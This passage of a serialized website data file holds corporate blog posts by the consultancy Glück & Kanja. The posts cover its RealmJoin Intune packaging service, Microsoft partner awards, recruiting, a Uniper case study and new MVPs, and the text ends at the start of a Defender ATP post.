e":2396,"avatar":2397,"permalink":2398,"linkedin":2399,"twitter":2290},{"display_name":2401,"avatar":2402,"permalink":2403,"linkedin":2404,"twitter":2290,"imageOffsetTop":2300},{"display_name":2406,"avatar":2407,"permalink":2408,"linkedin":2409,"twitter":2290},{"display_name":2411,"avatar":2412,"permalink":2413,"twitter":2290},{"display_name":2415,"avatar":2416,"permalink":2417,"twitter":2290,"linkedin":2418},{"display_name":2420,"avatar":2421,"permalink":2422,"twitter":2423,"linkedin":2424},{"display_name":2426,"avatar":2427,"permalink":2428,"linkedin":2429,"twitter":2290},{"display_name":2431,"avatar":2432,"permalink":2433,"twitter":2290,"linkedin":2342},{"display_name":2209,"avatar":2435,"permalink":2436,"twitter":2437,"linkedin":2437,"imageOffsetTop":2300,"socials":2587},[2588,2589],{"text":2440,"href":2441},{"text":2443,"href":2444},{"display_name":2446,"avatar":2447,"permalink":2448,"twitter":2449,"linkedin":2450},{"display_name":2452,"avatar":2453,"permalink":2454,"twitter":2290,"linkedin":2342},{"display_name":2456,"avatar":2457,"permalink":2458,"twitter":2459,"linkedin":2342},{"display_name":2461,"avatar":2462,"permalink":2463,"twitter":2464,"linkedin":2465},{"display_name":2467,"avatar":2468,"permalink":2469,"twitter":2470,"linkedin":2470},{"display_name":2472,"avatar":2473,"permalink":2474,"twitter":2475,"linkedin":2476},{"display_name":2478,"avatar":2479,"permalink":2480,"twitter":2481,"linkedin":2482},{"display_name":2484,"avatar":2485,"permalink":2486,"linkedin":2487,"twitter":2290},{"display_name":2489,"avatar":2490,"permalink":2491,"linkedin":2492,"twitter":2290},{"display_name":2494,"avatar":2495,"permalink":2496,"linkedin":2497,"twitter":2498},{"display_name":2500,"avatar":2501,"permalink":2502,"linkedin":2503},{"display_name":2505,"avatar":2506,"permalink":2507,"linkedin":2508},{"display_name":2510,"avatar":2511,"permalink":2512,"linkedin":2513},{"display_name":2515,"avatar":2516,"permalink":2517,"linkedin":2518},{"display_name":2520,"avatar":2521
,"permalink":2522,"linkedin":2523,"imageOffsetTop":2300},{"display_name":2525,"avatar":2526,"permalink":2527,"linkedin":2528,"imageOffsetTop":2300},{"display_name":2530,"avatar":2531,"permalink":2532,"linkedin":2533,"imageOffsetTop":2378},{"display_name":2535,"avatar":2536,"permalink":2537,"linkedin":2538,"imageOffsetTop":2378},{"display_name":7,"avatar":2540,"permalink":2541,"linkedin":2542,"imageOffsetTop":2378},{"display_name":2544,"avatar":2545,"permalink":2546,"linkedin":2547,"imageOffsetTop":2548,"imageOffsetLeft":2549},{"display_name":2551,"avatar":2552,"permalink":2553,"linkedin":2554,"imageOffsetTop":2555,"imageOffsetLeft":2556},"Authors","authors","Qkbr0Ywae26Kxloa5JhqFSd0eMg8Ccs9DhjH7FyMzvY",[2615,2829,2977,3002,3092,3133,3190,3399,3535,3663,3737,3807,3845,4031,4161,4247,4321,4403,4492,4848,4899,4954,5016,5072,5115,5302,5514,5622,5728,5831,5897,5962,6039,6215,6374,6708,7008,7664,7777,7907,7982,8137,8249,20678,20890,21030,21793,22044,22198,22366,22497,22620,23440,24133,24196,24505,24735],{"id":2616,"title":2617,"author":2420,"body":2618,"cta":2166,"description":2807,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":2808,"moment":2819,"navigation":2181,"path":2820,"seo":2821,"stem":2822,"tags":2823,"webcast":2168,"__hash__":2828},"content_en/posts/2018-09-25-intunewin.md","Intune Package Store",{"type":9,"value":2619,"toc":2801},[2620,2639,2646,2650,2661,2664,2683,2687,2700,2706,2717,2721,2731,2736,2747,2752,2755,2758,2777,2781],[12,2621,2622,2623,2626,2627,2630,2631,2634,2635,2638],{},"On Monday, September 24, at Ignite in Orlando, Microsoft announced the new ",[251,2624,2625],{},"Intune Win32 App-Packaging"," technology (also named ",[251,2628,2629],{},"intunewin","). Due to our strong relationship with the Intune product group our ",[251,2632,2633],{},"RealmJoin ecosystem"," is already completely adopted to this new format. 
That means that the new Intune technology is available to deploy ",[251,2636,2637],{},"hundreds of ready-to-use"," Windows application packages from the start. A cloud based package factory is ready to create any custom package request within hours to help customers to deploy 100% cloud managed workplaces - today.",[12,2640,2641],{},[2642,2643],"img",{"alt":2644,"src":2645},"RealmJoin at Ignite Intune Session","https://res.cloudinary.com/c4a8/image/upload/blog/pics/intune-ignite-glueckkanja.png",[186,2647,2649],{"id":2648},"background","Background",[12,2651,2652,2653,2656,2657,2660],{},"When the global logistics company ",[251,2654,2655],{},"DB Schenker"," with 60,000 users in more than 1,000 branches needed a modern workplace strategy the idea was born to design a future workplace not only consuming cloud services but living a cloud operated client without any local dependencies. Instead of consolidating over 350 Active Directories, their trusted partner and Microsoft awarded ",[251,2658,2659],{},"Partner of the Year Glück & Kanja"," designed a solution to deploy a large-scale Azure AD together with Microsoft Intune provisioned Windows 10. This enables the customer to deploy secure corporate clients everywhere - no matter if the user works from headquarters or the local Starbucks.",[12,2662,2663],{},"{% youtube ABUieErMHLU %}",[12,2665,2666,2667,2670,2671,2678,2679,2682],{},"Based on this experience, a blueprint was created to help other enterprise companies like ",[251,2668,2669],{},"EnBW, Uniper,"," and many more, deploy 100% cloud managed clients. The only real problem was that the deployment of Win32 applications were not possible at this time with native Intune. Glück & Kanja therefore developed a bridge technology called ",[2672,2673,2677],"a",{"href":2674,"rel":2675},"https://realmjoin.com",[2676],"nofollow","RealmJoin"," that closed the gap and worked as a companion to Intune to deploy thousands of different Windows applications from Adobe to SAP. 
Part of this ecosystem was a full-blown cloud based application store with ",[251,2680,2681],{},"pre-packaged Win32 applications"," to fast start any new project with predictable time and budget.",[186,2684,2686],{"id":2685},"the-technology","The Technology",[12,2688,2689,2690,2693,2694,2699],{},"Glück & Kanja designed a ",[251,2691,2692],{},"package factory"," based on modern development best practices. Instead of another incarnation of heavy loaded and aged SCCM or similar package formats and creation processes, the lightweight approach was to create a combination of binaries, metadata, and intelligence, into a well known package format called ",[2672,2695,2698],{"href":2696,"rel":2697},"https://www.nuget.org",[2676],"NuGet",". These packages are used by millions of developers every day and is proven in countless instances. NuGet are created in a version control system (git) offering a reliable auditing about what, when, and who has changed anything in the lifetime of a package. When a change is committed an Azure driven automation builds the packages within deterministic environments (CI/CD system) and automated tests are done before a package is published to get tested by human delivery experts or key users. Finally, the preview packages are released to production to be deployed on thousands of devices.",[12,2701,2702],{},[2642,2703],{"alt":2704,"src":2705},"RealmJoin Portal","https://res.cloudinary.com/c4a8/image/upload/blog/pics/realmjoin-app-portal.png",[12,2707,2708,2709,2712,2713,2716],{},"When working with the ",[251,2710,2711],{},"Intune product group"," and their design of a modern packaging system for Win32 applications, it was obvious that their package format was nearly identical to the approach we have used for the last two years. 
And because of the automation system we’ve designed to create packages, we did not need to change anything in the sources but instead transformed the automation code to create the ",[251,2714,2715],{},"new .intunewin package format",". We publish the packages directly into the Intune backend by using a pre-release of the Microsoft Graph API for Intune.This made it possible to offer hundreds of ready-to-deploy packages to a diverse customer audience that are interested in removing the barriers of an on-premise bound deployment, in favor of a 100% cloud managed Windows 10 experience.",[186,2718,2720],{"id":2719},"the-product","The Product",[12,2722,2723,2726,2727,2730],{},[2672,2724,2677],{"href":2674,"rel":2725},[2676]," is an enterprise ready SaaS infrastructure that supports AutoPilot, Azure AD, and Intune based Windows deployments, with the necessary companion technology to complete the cloud management picture of modern workplace deployments. While Intune was already great in managing lots of aspects in these scenarios a bunch of missing pieces like seamless Bitlocker rollout, asset and license inventory, legacy identity headaches, and most important the deployment of Win32 applications, was not ready for large scale deployments. RealmJoin solves these issues with an ",[251,2728,2729],{},"AzureAD/Intune integrated combination"," of a cloud based, multi-tenant operations backend, a lightweight client agent, and a package factory with a peer2peer-enabled CDN. 
Also, the package management allows application installation on thousands of machines worldwide with moderate bandwidth by using peer caching and offering all necessary extras like dependencies, staggered deployments, and managing the compliance state of devices.",[12,2732,2733],{},[2642,2734],{"alt":2704,"src":2735},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/realmjoin-user-portal.png",[12,2737,2738,2739,2742,2743,2746],{},"With the release of the new Intune package format in October, the ",[251,2740,2741],{},"RealmJoin SaaS"," solution will offer the same companion features to the native Intune deployment ecosystem. A modern workplace deployment will be possible with no on-premise dependency by using the AzureAD and Intune in combination with the RealmJoin offered Intune packages. But this journey will not end by deploying the software - the whole lifecycle is ",[251,2744,2745],{},"cloud managed"," in an intuitive web portal with full insights about the health and state of all systems and easy assignment of software to AzureAD groups within one dashboard. This is also a great approach to separate the levels of administration, and gives first and second level support with the tools they need without the learning curve of a full blown Azure portal.",[12,2748,2749],{},[2642,2750],{"alt":2704,"src":2751},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/realmjoin-device-portal.png",[12,2753,2754],{},"The RealmJoin App Store for Microsoft Intune helps to fast start any new project with predictable time and budget.\nBut not only the pre-packaged applications are available for a fixed price. 
Also the Packaging-as-a-Service offering\nwe provide for all modern workplace projects is a fixed price per package agreement to make your Windows 10 migration\na safe and predictable project.",[12,2756,2757],{},"Along with the RealmJoin App Store, there are a few other products worth mentioning.",[12,2759,2760,2761,2764,2765,2770,2771,2776],{},"The migration to Windows 10 is well supported by great Microsoft Offerings, like Windows Analytics. However, when theory meets reality there are always some road-blockers. One issue we currently see is around documents and particularly ",[251,2762,2763],{},"PST files"," on local disks. ",[2672,2766,2769],{"href":2767,"rel":2768},"https://realmigrator.com",[2676],"RealMigrator"," is another SaaS product that helps to get the local data safely and silently migrated. And with ",[2672,2772,2775],{"href":2773,"rel":2774},"https://konnekt.io",[2676],"Konnekt"," we provide for Citrix and the Virtual Desktop world, one can integrate OneDrive OnDemand and SharePoint/Office 365 group access without the headaches of massively synced data.",[186,2778,2780],{"id":2779},"next-steps","Next Steps",[12,2782,2783,2784,2788,2789,2794,2795,2800],{},"If you’re interested in the cloud approach of modern workplaces, we are happy to get ",[2672,2785,2787],{"href":2786},"mailto:info@realmjoin.com","in contact"," with you. 
We've also provided a Website ",[2672,2790,2793],{"href":2791,"rel":2792},"https://intunewin.com",[2676],"intunewin.com"," and tweet at ",[2672,2796,2799],{"href":2797,"rel":2798},"https://twitter.com/intunewin",[2676],"@intunewin"," to consolidate all information about the new Intune Win32 application deployment capabilities.",{"title":65,"searchDepth":111,"depth":111,"links":2802},[2803,2804,2805,2806],{"id":2648,"depth":329,"text":2649},{"id":2685,"depth":329,"text":2686},{"id":2719,"depth":329,"text":2720},{"id":2779,"depth":329,"text":2780},"On Monday, September 24, at Ignite in Orlando, Microsoft announced the new Intune Win32 App-Packaging technology (also named intunewin). Due to our strong relationship with the Intune product group our RealmJoin ecosystem is already completely adopted to this new format. That means that the new Intune technology is available to deploy hundreds of ready-to-use Windows application packages from the start. A cloud based package factory is ready to create any custom package request within hours to help customers to deploy 100% cloud managed workplaces - today.",{"lang":2171,"categories":2809,"blogtitlepic":2811,"thumb":2812,"socialimg":2813,"customExcerpt":2814,"hreflang":2815,"scripts":2818},[2810],"Workplace","head-intunewin","thumb-intunewin","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-intunewin.jpg","On Monday, September 24, at Ignite in Orlando, Microsoft announced the new Intune Win32 App-Packaging technology (also named intunewin). 
Due to our strong relationship with the Intune product group our RealmJoin ecosystem is already completely adopted to this new format.",[2816],{"lang":2260,"href":2817},"/blog/workplace/2018/09/intunewin",{"slick":2181,"form":2181},"2018-09-24","/posts/2018-09-25-intunewin",{"title":2617,"description":2807},"posts/2018-09-25-intunewin",[2810,2824,2825,2677,2826,2827],"Intune","Win32","Packaging","Intunewin","6eRl-EdKw2lTwbUC6Q5kRaJmwXvvu66Cc1c8RKJMba0",{"id":2830,"title":2831,"author":2461,"body":2832,"cta":2166,"description":2838,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":2960,"moment":2966,"navigation":2181,"path":2967,"seo":2968,"stem":2969,"tags":2970,"webcast":2168,"__hash__":2976},"content_en/posts/2019-06-06-gk-microsoft-partner-of-the-year.md","Glueck & Kanja recognized as winner for 2019 Microsoft Partner of the Year Award",{"type":9,"value":2833,"toc":2957},[2834,2839,2842,2849,2852,2859,2870,2915,2922,2925,2929],[12,2835,2836],{},[251,2837,2838],{},"Glueck & Kanja Consulting AG recognized as 2019 Microsoft Country Partner of the Year for Germany and 2019 Microsoft Global Modern Desktop Partner of the Year.",[12,2840,2841],{},"Glueck & Kanja today proudly announced it has won the 2019 Microsoft Country Partner of the Year Award for Germany and the 2019 Microsoft Global Modern Desktop Award. The company was honored among a global field of top Microsoft partners for demonstrating excellence in innovation and implementation of customer solutions based on Microsoft technology.",[12,2843,2844,2845,2848],{},"Christian Kanja, CEO of Glueck & Kanja, is very pleased about the two awards from Redmond: “It was a bet on the future. Avoiding the complexity of hybrid infrastructures and consequently designing for cloud was the basic idea. Similar to Tesla we believed Microsoft had the right vision but there were concerns in the market and technical problems to solve. 
Focusing on ",[251,2846,2847],{},"100% Cloud"," we were able to provide convincing answers and prove our success hundreds of thousands of times. With achieving the awards Microsoft has – again – acknowledged that we are on track with our efforts.”",[12,2850,2851],{},"Awards were presented in several categories, with winners chosen from a set of more than 2,900 entrants from 115 countries worldwide. Glueck & Kanja was recognized for providing outstanding solutions and services in Modern Desktop architecture, as well as representing excellent subsidiary engagement in Germany.",[12,2853,2854,2855,2858],{},"The Microsoft ",[251,2856,2857],{},"Country Partner"," of the Year Award honors partners at the country level that have demonstrated business excellence in delivering Microsoft solutions to multiple customers over the past year. This year the joint application of GAB, Glueck & Kanja and PHAT convinced. Over the past two years, the three Microsoft partners based in Munich, Offenbach and Hamburg have consistently implemented Microsoft cloud technologies in many projects with strong standardization and thereby developed a joint '100% Cloud' Blueprint that is unique in the market. The intensive experience exchange leads to a unique level of reliability in the introduction of Microsoft's cloud solutions.",[12,2860,2861,2862,2865,2866,2869],{},"Internationally, Glueck & Kanja was able to further expand its expertise in the field of ",[251,2863,2864],{},"Modern Desktop",". The German company is among the absolute world leaders when it comes to deploying workplaces in the enterprise environment independently of traditional IT infrastructures. 
Now also known as 'Starbucks Deployment', Glueck & Kanja has made a significant contribution in recent years to ",[251,2867,2868],{},"operating modern workplaces completely cloud based"," - including the necessary applications and state-of-the-art security.",[12,2871,2872,2873,2879,2880,1402,2883,2886,2887,1402,2890,2886,2893,1402,2896,2901,2902,2907,2908,2914],{},"But Glueck & Kanja also added several managed services on top of the cloud based architecture. With the release of the new Microsoft Intune package format in October 2018, the company made it possible to offer ",[251,2874,2875],{},[2672,2876,2878],{"href":2791,"rel":2877},[2676],"hundreds of ready-to-deploy packages"," to a diverse customer audience that is interested in removing the barriers of an on-premises-bound deployment, in favor of a 100% cloud managed Windows 10 experience. In addition, ",[251,2881,2882],{},"the package management",[2672,2884,2677],{"href":2674,"rel":2885},[2676],"), ",[251,2888,2889],{},"data migration service",[2672,2891,2769],{"href":2767,"rel":2892},[2676],[251,2894,2895],{},"certificate services",[2672,2897,2900],{"href":2898,"rel":2899},"https://scepman.com",[2676],"SCEP"," and ",[2672,2903,2906],{"href":2904,"rel":2905},"https://radius-as-a-service.com",[2676],"RADIUS",") and finally a ",[251,2909,2910],{},[2672,2911,2913],{"href":2912},"en/portfolio/cloud-security-operations-center/","Cloud Security Operations Center"," are provided as a service offer.",[12,2916,2917,2918,2921],{},"“We are honored to recognize Glueck & Kanja of Germany as a Microsoft Country and Microsoft Global Modern Desktop Partner of the Year,” said ",[251,2919,2920],{},"Gavriella Schuster, Corporate Vice President, One Commercial Partner, Microsoft Corp."," “Glueck & Kanja has distinguished itself as an exemplary partner, demonstrating remarkable expertise and innovation to help customers achieve more.”",[12,2923,2924],{},"The Microsoft Partner of the Year Awards recognize Microsoft partners that have 
developed and delivered exceptional Microsoft-based solutions over the past year.",[41,2926,2928],{"id":2927},"links","Links",[1254,2930,2931,2937,2943,2950],{},[1257,2932,2933],{},[2672,2934,2936],{"href":2935},"/documents/press-releases/201906-gk-PressReleasePOYAward-DE.pdf","Press Release (German)",[1257,2938,2939],{},[2672,2940,2942],{"href":2941},"/documents/press-releases/201906-gk-PressReleasePOYAward-EN.pdf","Press Release (English)",[1257,2944,2945],{},[2672,2946,2949],{"href":2947,"rel":2948},"https://partner.microsoft.com/inspire/awards",[2676],"Microsoft Inspire",[1257,2951,2952],{},[2672,2953,2956],{"href":2954,"rel":2955},"https://company-36087.frontify.com/d/rx2v6DVIyMGz/glueck-kanja-style-guide#/collaterals/microsoft-partner-of-the-year",[2676],"Microsoft Logos",{"title":65,"searchDepth":111,"depth":111,"links":2958},[2959],{"id":2927,"depth":111,"text":2928},{"lang":2171,"categories":2961,"blogtitlepic":2963,"thumb":2964,"socialimg":2965,"customExcerpt":2838},[2962],"Corporate","head-poy-2019","thumb-poy-2019","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/keyvisuals/kv-home-award-2019.jpg","2019-06-06","/posts/2019-06-06-gk-microsoft-partner-of-the-year",{"title":2831,"description":2838},"posts/2019-06-06-gk-microsoft-partner-of-the-year",[2971,2972,2973,2974,2975],"Microsoft","Award","Partner of the Year","Country Partner of the Year","100 Cloud","C-2OGk4tRli4gJItc1mDJRh3UZ01XV24kYbru2BYZZg",{"id":2978,"title":2979,"author":2461,"body":2980,"cta":2166,"description":2984,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":2990,"moment":2995,"navigation":2181,"path":2996,"seo":2997,"stem":2998,"tags":2999,"webcast":2168,"__hash__":3001},"content_en/posts/2019-06-28-gk-top-100.md","Glück & Kanja Consulting belongs in the TOP 100",{"type":9,"value":2981,"toc":2988},[2982,2985],[12,2983,2984],{},"Once again Glück & Kanja was able to impress with its focus on 100% Cloud. 
The IT company was one of the first German Microsoft partners to recognize the potential of cloud technology and thus opened up a completely new business area: Experts accompany large companies on their way to the cloud - from planning to complete deployment.",[12,2986,2987],{},"Five years ago, the topic of cloud computing was hardly worth mentioning for many IT specialists. Harald Glück and Christian Kanja had little doubt about the worldwide triumphal procession of cloud technology from the very beginning: \"The top innovators recognized early on that its implementation would work best with a combination of Microsoft structures and software developed in-house. \"So we virtually provide the necessary glue,\" says Harald Glück. With this innovative approach, the TOP 100 company was able to convince more and more users to switch off their own servers and rely on Microsoft's cloud solutions instead. \"100 % Cloud\" is now the slogan of the medium-sized company, which has held the highest level of Microsoft partner certification for more than 20 years.",{"title":65,"searchDepth":111,"depth":111,"links":2989},[],{"lang":2171,"categories":2991,"blogtitlepic":2992,"thumb":2993,"socialimg":2994,"customExcerpt":2984},[2962],"head-top100award","thumb-top100award","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/thumb-top100award-bw.jpg","2019-06-28","/posts/2019-06-28-gk-top-100",{"title":2979,"description":2984},"posts/2019-06-28-gk-top-100",[3000,2972],"Top 100","-F8rCcJJIXff5ZT6y37bDRvft-LNq-Q-AEScb58mk-M",{"id":3003,"title":3004,"author":2415,"body":3005,"cta":2166,"description":3076,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3077,"moment":3083,"navigation":2181,"path":3084,"seo":3085,"stem":3086,"tags":3087,"webcast":2168,"__hash__":3091},"content_en/posts/2019-07-16-new-employees.md","Seven new employees in the first half-year. 
We say Welcome",{"type":9,"value":3006,"toc":3074},[3007,3013,3036,3043,3049,3055,3064,3071],[12,3008,3009,3010,1013],{},"With the success of our 100% cloud strategy, we face the challenge of growing our teams in a healthy way. In the past it was not easy for us as an IT consulting company to make our company known on the job market. Many applicants told us that they came across Glück & Kanja rather by chance, as we were often not noticed in the multitude of job portals and lists of job offers. In autumn 2018 we started our ",[251,3011,3012],{},"\"Desire for change?\" campaign",[12,3014,3015,3016,3019,3020,805,3025,2901,3030,3035],{},"What was important to us? We knew that we had a lot to offer interested people: very exciting and future-oriented topics, an attractive working atmosphere with great people, and a relaxed and appreciative corporate culture. In the first step we therefore prepared the imagery and texts on our career page in such a way that these advantages were clearly highlighted. We also decided to make our profiles on XING, and thus also on kununu, more attractive in order to ",[251,3017,3018],{},"actively promote our employer branding",". In addition, we used social networks such as ",[2672,3021,3024],{"href":3022,"rel":3023},"https://www.xing.com/company/glueckkanja",[2676],"XING",[2672,3026,3029],{"href":3027,"rel":3028},"https://www.linkedin.com/company/glueckkanja-gab",[2676],"LinkedIn",[2672,3031,3034],{"href":3032,"rel":3033},"https://twitter.com/glueckkanja",[2676],"Twitter"," to make the classic job postings more visible.",[12,3037,3038,3039,3042],{},"In the subsequent interviews we received good feedback on our ",[251,3040,3041],{},"company presentation on kununu",", especially on the ratings. Let me say it right away: We have no influence on the ratings! However, we have noticed that kununu is now often used by applicants to get a better picture of what it looks like behind the scenes of a company. 
Therefore we ask our new employees if they would give us an evaluation after the first months of settling in. We also ask candidates to evaluate us during the application process.",[12,3044,3045],{},[2642,3046],{"alt":3047,"src":3048},"Employees in the kitchen","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/pics/collage-new-employees.jpg",[12,3050,3051,3054],{},[251,3052,3053],{},"Our application procedure"," has been simple and clearly structured for many years: After a first contact has been established, we arrange a telephone interview of about one hour. This will clarify initial questions from both sides and we get to know each other better. We've always been on first-name terms at Glück & Kanja, as is customary between Microsoft and its partners. It is an important part of our company culture, and we only have positive experiences with it. After the telephone interview, we arrange a meeting at our office in Offenbach and make a decision as soon as possible. It is important to us that all candidates know what awaits them at each stage and what steps will follow until they actually start work and during the onboarding period.",[12,3056,3057,3058,3063],{},"It is often difficult to look into a company from the outside and assess whether it is really as good as it seems. Our numerous videos on ",[2672,3059,3062],{"href":3060,"rel":3061},"https://www.youtube.com/user/glueckkanja",[2676],"YouTube"," have proven to be helpful. Since 2016, we have had our employees report on various topics in live webcast format. Through these clips, interested parties can get to know the topics, people and culture at Glück & Kanja directly. In addition, we provide a concrete picture of the topics in which applicants will be working in the future. 
Of course we also invite new employees to participate in the creation of blogs, magazine articles and webcasts.",[12,3065,3066,3067,3070],{},"Onboarding usually begins one month before the actual start date. It is important to us that new \"GKlers\" have the opportunity to get to know us a little beforehand and learn about the topics we are working on. All new employees also have access to ",[251,3068,3069],{},"our trainings",". Some of them already took part in the training courses before their official start date. This enabled us to establish contact with colleagues and teams of specialists at an early stage. We are naturally very pleased about such a commitment.",[12,3072,3073],{},"Seven new employees in the last six months - we have never grown so fast in such a short time! Glück & Kanja welcomes all new colleagues. It is important to us that our new team members feel comfortable in our company and find their way around quickly and easily. Also in the second half of the year we would like to find many motivated people who are interested in creating cloud solutions with us. Talk to us!",{"title":65,"searchDepth":111,"depth":111,"links":3075},[],"With the success of our 100% cloud strategy, we face the challenge of growing our teams in a healthy way. In the past it was not easy for us as an IT consulting company to make our company known on the job market. Many applicants told us that they came across Glück & Kanja rather by chance, as we were often not noticed in the multitude of job portals and lists of job offers. In autumn 2018 we started our \"Desire for change?\" campaign.",{"lang":2171,"categories":3078,"blogtitlepic":3079,"thumb":3080,"socialimg":3081,"customExcerpt":3082},[2962],"head-new-employees","thumb-new-employees","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-new-employees.jpg","Glück & Kanja faces the challenge of allowing the teams of specialists to grow in a healthy way. 
Through active employer branding, we have managed to stand out from the crowd and recruit seven new employees in the first half of the year.","2019-07-16","/posts/2019-07-16-new-employees",{"title":3004,"description":3076},"posts/2019-07-16-new-employees",[3088,3089,3090],"Employer Branding","Top Employer","Recruiting","YmEn3qf2wllEklC7IvoszMTdQSpnsDBoaJH7mxe34gQ",{"id":3093,"title":3094,"author":2461,"body":3095,"cta":2166,"description":3099,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3119,"moment":3124,"navigation":2181,"path":3125,"seo":3126,"stem":3127,"tags":3128,"webcast":2168,"__hash__":3132},"content_en/posts/2019-08-31-casestudy-uniper.md","Uniper's Unique Journey to 100% cloud",{"type":9,"value":3096,"toc":3117},[3097,3100,3103,3106,3109],[12,3098,3099],{},"In the rapidly changing energy industry, the energy company Uniper wanted more operational agility, without sacrificing security and stability. With the introduction of Microsoft 365, Uniper transformed its workplace culture and enhanced collaboration and security across the company to help meet the needs of the European energy future.",[12,3101,3102],{},"Uniper is an international energy company with approximately 11,000 employees. It supports energy conversion by ensuring a stable supply regardless of environmental conditions and helping to bridge the transition from carbon to renewable energy. 
It's a complex mix of demands, changes, and challenges, and Uniper meets them with creativity, agility, innovative thinking, and powerful technology.",[12,3104,3105],{},"\"With power plants with a net capacity of approximately 34 gigawatts and operations in more than 40 countries, Uniper is one of the largest global power generators, and we are committed to providing a stable energy supply and supporting energy transition,\" said Hans Pezold, senior vice president of Information Technology at Uniper.\n\"To achieve this, we had to become more efficient and digitize our business.\"",[12,3107,3108],{},"In partnership with Glück and Kanja, Uniper has launched a complete Microsoft 365 solution that combines Office 365, Windows 10 and Enterprise Mobility + Security to create a more effective, collaborative, secure and consistent work environment.",[12,3110,3111,3112,1265],{},"The complete story in words and pictures can be found ",[2672,3113,3116],{"href":3114,"rel":3115},"https://customers.microsoft.com/en-us/story/748199-uniper-energy-microsoft365",[2676],"here",{"title":65,"searchDepth":111,"depth":111,"links":3118},[],{"lang":2171,"categories":3120,"blogtitlepic":3121,"thumb":3122,"socialimg":3123,"customExcerpt":3108},[2962],"head-uniper-casestudy","thumb-uniper-casestudy","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-uniper-casestudy.jpg","2019-08-31","/posts/2019-08-31-casestudy-uniper",{"title":3094,"description":3099},"posts/2019-08-31-casestudy-uniper",[3129,2975,2971,3130,3131],"Casestudy","Customer","Success Story","lndiWQeL4LrtUISKWG1ivafn4c1d54iCSIOax95jbLM",{"id":3134,"title":3135,"author":2461,"body":3136,"cta":2166,"description":3177,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3178,"moment":3183,"navigation":2181,"path":3184,"seo":3185,"stem":3186,"tags":3187,"webcast":2168,"__hash__":3189},"content_en/posts/2019-12-15-neue-gk-mvps.md","Two MVPs for Glück & 
Kanja",{"type":9,"value":3137,"toc":3175},[3138,3152,3172],[12,3139,3140,3141,3146,3147,1013],{},"Oliver Kieselbach is MVP for Enterprise Mobility for the second time in a row. As a cloud architect and consultant, Oliver specializes in the architecture, operation and deployment of Microsoft cloud infrastructure components. His contributions to the community can be found ",[2672,3142,3145],{"href":3143,"rel":3144},"https://oliverkieselbach.com/",[2676],"in his blog",". You can follow him on Twitter at ",[2672,3148,3151],{"href":3149,"rel":3150},"https://twitter.com/okieselb",[2676],"@okieselb",[12,3153,3154,3155,3160,3161,3166,3167,1013],{},"Jan Geisbauer was awarded the Microsoft MVP for Cloud and Datacenter Management with focus on Enterprise Security for the first time. His blog \"Modern Security in a Cloud World\" can be found at ",[2672,3156,3159],{"href":3157,"rel":3158},"https://emptydc.com/author/jangeisbauer/",[2676],"https://emptydc.com/",". Together with his colleague Marco Scheel, he also produces the ",[2672,3162,3165],{"href":3163,"rel":3164},"https://hairlessinthecloud.wordpress.com/",[2676],"Hairless in the Cloud"," podcast with its content about the Microsoft Cloud. You can follow him on Twitter at ",[2672,3168,3171],{"href":3169,"rel":3170},"https://twitter.com/janvonkirchheim",[2676],"@janvonkirchheim",[12,3173,3174],{},"We are happy that they are part of the Glück & Kanja team!",{"title":65,"searchDepth":111,"depth":111,"links":3176},[],"Oliver Kieselbach is MVP for Enterprise Mobility for the second time in a row. As a cloud architect and consultant, Oliver specializes in the architecture, operation and deployment of Microsoft cloud infrastructure components. His contributions to the community can be found in his blog. 
You can follow him on Twitter at @okieselb.",{"lang":2171,"categories":3179,"blogtitlepic":3180,"socialimg":3181,"customExcerpt":3182},[2962],"head-two-mvps","https://res.cloudinary.com/c4a8/image/upload/c_limit,f_auto,q_auto,dpr_auto/blog/heads/head-kieselbach-mvp.jpg","Oliver Kieselbach and Jan Geisbauer have been appointed **Microsoft Most Valuable Professionals (MVP)**. The Microsoft MVP Award recognizes outstanding technical expertise and achievements for the community. Once again, the extraordinary commitment and high level of competence of the two experts has proven itself.","2019-12-15","/posts/2019-12-15-neue-gk-mvps",{"title":3135,"description":3177},"posts/2019-12-15-neue-gk-mvps",[3188,3088],"MVP","YFz4CMKRp9sNSv37QdpMbXZoJeEHGsj2bkJeNM2cdPk",{"id":3191,"title":3192,"author":3193,"body":3195,"cta":2166,"description":3384,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":3385,"moment":3390,"navigation":2181,"path":3391,"seo":3392,"stem":3393,"tags":3394,"webcast":2168,"__hash__":3398},"content_en/posts/2020-03-02-mdatp.md","Put regulation fears to rest when deploying Microsoft Defender ATP",[2209,3194],"Heike Ritter (Microsoft)",{"type":9,"value":3196,"toc":3376},[3197,3206,3209,3215,3218,3221,3229,3232,3239,3242,3245,3249,3252,3255,3258,3267,3270,3273,3277,3280,3312,3319,3323,3326,3343,3349,3353,3356,3360,3363,3367,3370,3373],[12,3198,3199,3200,3205],{},"The power of ",[2672,3201,3204],{"href":3202,"rel":3203},"https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection",[2676],"Microsoft Defender Advanced Threat Protection (ATP)"," lies in the intelligent analysis of the data. 
